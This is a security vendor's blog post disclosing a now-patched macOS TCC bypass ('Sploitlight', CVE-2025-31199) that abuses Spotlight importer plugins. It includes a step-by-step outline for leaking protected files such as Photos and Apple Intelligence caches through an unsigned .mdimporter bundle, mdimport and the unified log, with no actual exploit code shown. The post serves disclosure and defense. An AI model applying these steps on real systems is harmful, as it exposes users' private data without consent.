Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability

Credit to Author: Microsoft Threat Intelligence| Date: Mon, 28 Jul 2025 16:00:00 +0000

Microsoft Threat Intelligence has discovered a macOS vulnerability that could allow attackers to steal private data of files normally protected by Transparency, Consent, and Control (TCC), such as files in the Downloads folder, as well as caches utilized by Apple Intelligence. While similar to prior TCC bypasses like HM-Surf and powerdir, the implications of this vulnerability, which we refer to as “Sploitlight” for its use of Spotlight plugins, are more severe due to its ability to extract and leak sensitive information cached by Apple Intelligence, such as precise geolocation data, photo and video metadata, face and person recognition data, search history and user preferences, and more. These risks are further complicated and heightened by the remote linking capability between iCloud accounts, meaning an attacker with access to a user’s macOS device could also exploit the vulnerability to determine remote information of other devices linked to the same iCloud account.

After discovering the bypass technique during proactive hunting for processes with privileged entitlements, we shared our findings with Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). Apple released a fix for this vulnerability, now identified as CVE-2025-31199, as part of security updates for macOS Sequoia, released on March 31, 2025. We thank the Apple security team for their collaboration in addressing this vulnerability and encourage macOS users to apply these security updates as soon as possible.

As a reminder, TCC is a technology designed to prevent applications from accessing users’ personal information, including services such as location services, camera, microphone, Downloads directory, and others, without obtaining prior consent and knowledge from users. The only legitimate method for an application to gain access to these services is through user approval via a popup prompt within the user interface or by granting per-app access in the operating system’s settings.

In this blog post, we display how, despite Spotlight plugins being carefully and heavily restricted to maintain their privileged access to sensitive files, they can still be abused to exfiltrate file contents. Our research demonstrates how this privileged access and the ability to manipulate these plugins blur the line between operating system components, like the mds daemon and mdworker task, and non-OS components, like the plugins themselves. Further, we show how the TCC bypass works against well-defined file types, as well as how it could be abused to get valuable data such as information tagged by Apple Intelligence and remote information of other iCloud account-linked devices.

Background: Spotlight importers

Spotlight is a built-in macOS application that is capable of quickly finding content on a device by means of indexing. Users can use the Command +Space shortcut to trigger a file search. However, Spotlight supports plugins known as Spotlight importers to further index data found on a device. For example, Outlook can index emails for them to appear in search. Those plugins are macOS bundles ending with a .mdimporter suffix, and can be listed by using the mdimport utility with the -L command line flag:

To support that architecture, the technology works in a producer-consumer design, where tools such as Spotlight (or the mdfind command utility) consume data from index files that are saved locally, and an indexing service produces and updates those index files.

The indexing service is known as mds and acts as a system daemon. Upon file modifications, the kernel triggers the mds daemon, which in turn creates a heavily sandboxed task called mdworker, which runs the plugin logic and updates the index.

Spotlight plugins have been studied in the past, notable examples include:

• Csaba Fitzl’s blog post on how they can be used for persistence.
• Patrick Wardle’s KnockKnock utility that checks for persistence of Spotlight importers.
• Jonathan Levin’s *OS Internals, Vol I, that examines the workings of Spotlight importers.

Spotlight plugins declare which type of files they can process via their Info.plist file, and when such a file is scanned by the mds daemon, a mdworker task will eventually invoke their GetMetadataForFile function.

Turning a plugin into a TCC bypass

We have covered several TCC bypasses in the past, such as CVE-2021-30970 (“powerdir”) and CVE-2024-44133 (“HM-Surf”). As a reminder, TCC is a technology that prevents apps from accessing users’ personal information, including services such as location services, camera, microphone, Downloads directory, and others, without their prior consent and knowledge. In this blog post, we shall focus primarily on access to private files protected by TCC, such as the Downloads directory, the Pictures directory, or the user’s Desktop.

Due to the privileged access that Spotlight plugins have to sensitive files for indexing purposes, Apple imposes heavy restrictions on them via its Sandbox capabilities. On modern macOS systems, Spotlight plugins are not even permitted to read or write any file other than the one being scanned. However, we have concluded that this is insufficient, as there are multiple ways for attackers to exfiltrate the file’s contents. In our exploit, we have decided to simply log the file’s bytes to the unified log in chunks:

Assuming an attacker knows specific file types they wish to read, they can simply perform the following steps:

1. Change the bundle’s Info.plist and schema.xml files to declare the file types they wish to leak in UTI form. Since we assume an attacker runs locally, this is always possible to resolve, even for dynamic types.
2. Copy the bundle into ~/Library/Spotlight directory. Note the bundle does not need to be signed at all.
3. Force Spotlight to use the new bundle via the mdimport -r command, and validate it’s indeed loaded with the mdimport -L command.
4. Use mdimport -i <path> to recursively scan files under the given path and leak them. Note the calling app does not require TCC permissions to the indexed directory as it’s done by the mdworker task.
5. Use the log utility to read the files contents.

The determination of UTI for dynamic types can be done with the uttype utility, even if the calling app does not have TCC access to the right directory. For example, here is the resolution of the TCC-protected Photos.sqlite file:

Note since .mdimporter is an unsigned bundle, an attacker doesn’t even need to recompile to adjust to other file types—they could just modify Info.plist and schema.xml as they see fit. We therefore conclude an attacker can trivially discover and read arbitrary files from sensitive directories normally protected by TCC. Our initial exploit focused on the Downloads folder, only to later draw our attention to the Pictures folder.

We have coded a full proof-of-concept (POC) exploit code dubbed “Sploitlight” that automates this entire process and shared it with Apple:

Exposing more sensitive data from Apple Intelligence

The ability to read sensitive files is more dangerous than it seems. As it turns out, the newly acclaimed Apple Intelligence (which is installed by default on all ARM-based devices) performs caching of its data under various directories. For example, one such directory lives under the user’s Pictures directory:

Access to those files is protected by the “Pictures” TCC service type and cannot be accessed without a user’s approval. However, as we previously demonstrated with the Sploitlight POC, we can leak arbitrary files’ contents and thus extract the contents of those database files.

There are many great utilities for extracting private information from Photos.sqlite and photos.db, but we’d like to summarize what information attackers would be able to obtain:

Alongside those implications of an attacker gaining such detailed private information on a targeted user’s device, it’s important to remember that Apple devices that share the same iCloud account will have different Photos.sqlite database files, but face tagging and other metadata propagates between devices. This means that an attacker with access to a user’s macOS device would also be able to determine remote information of other devices linked to that user’s iCloud account, such as data from the target user’s iPhone.

In addition, threat actors could just as easily gain private data from other Apple Intelligence cached files, such as email summaries and notes written with ChatGPT.

Strengthening protection against TCC bypass attacks

Attackers with the ability to bypass TCC protections on macOS devices can access sensitive data without user consent. The ability to further exfiltrate private data from protected directories, such as the Downloads folder and Apple Intelligence caches, is particularly alarming due to the highly sensitive nature of the information that can be extracted, including geolocation data, media metadata, and user activities. The implications of this vulnerability are even more extensive given the remote linking capability between devices using the same iCloud account, enabling attackers to determine more remote information about a user through their linked devices. Understanding the implications of TCC bypass vulnerabilities is essential for building proactive defenses that safeguard user data from unauthorized access.

By comprehending the broader impacts of these security concerns, we can better defend users and ensure their digital safety. Microsoft Defender for Endpoint allows organizations to quickly discover and remediate vulnerabilities such as Sploitlight in their increasingly heterogeneous networks. The insights gained from this research have enabled us to enhance Microsoft Defender for Endpoint’s detection mechanisms, providing robust protection against unauthorized access to private data by proactively detecting anomalous .mdimporter bundle installations, alongside any suspicious index of sensitive directories:

By continuously improving our security solutions, we aim to safeguard user information and uphold the trust placed in our products. Moreover, this research emphasizes the importance of continuous vigilance and collaboration with software vendors and the security community to identify and mitigate such vulnerabilities before they can be exploited. We would like to again thank the Apple security team for their collaboration in fixing CVE-2025-31199.

We encourage users to ensure they have applied the security updates released by Apple to mitigate this issue.

As cross-platform threats become more prevalent, Microsoft remains vigilant in monitoring the threat landscape to discover new vulnerabilities and attacker techniques affecting macOS and other non-Windows devices. Our proactive approach to vulnerability discoveries and threat intelligence sharing enhances protection technologies, ensuring that users can enjoy a secure computing experience safeguarded from threats, regardless of the platform or device they use.

Jonathan Bar Or

Alexia Wilson

Christine Fossaceca
Microsoft Threat Intelligence

References

• https://support.apple.com/guide/mac-help/search-with-spotlight-mchlp1008/mac
• https://developer.apple.com/library/archive/documentation/CoreFoundation/Conceptual/CFBundles/AboutBundles/AboutBundles.html
• https://ss64.com/mac/mdimport.html
• https://ss64.com/mac/mdfind.html
• https://theevilbit.github.io/posts/macos_persistence_spotlight_importers/
• https://attack.mitre.org/tactics/TA0003/
• https://objective-see.org/products/knockknock.html
• https://newosxbook.com/home.html
• https://developer.apple.com/library/archive/documentation/Carbon/Conceptual/MDImporters/Concepts/WritingAnImp.html
• https://developer.apple.com/documentation/xcode/configuring-the-macos-app-sandbox
• https://developer.apple.com/library/archive/documentation/FileManagement/Conceptual/understanding_utis/understand_utis_intro/understand_utis_intro.html
• https://manp.gs/mac/1/uttype
• https://www.apple.com/apple-intelligence/
• https://alastairs-place.net/blog/2012/06/06/utis-are-better-than-you-think-and-heres-why/

Learn more

Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025. Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.

Security Copilot customers can use the standalone experience to create their own prompts or run pre-built promptbooks to automate incident response or investigation tasks related to this threat.

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Sploitlight: Analyzing a Spotlight-based macOS TCC vulnerability appeared first on Microsoft Security Blog.

https://blogs.technet.microsoft.com/mmpc/feed/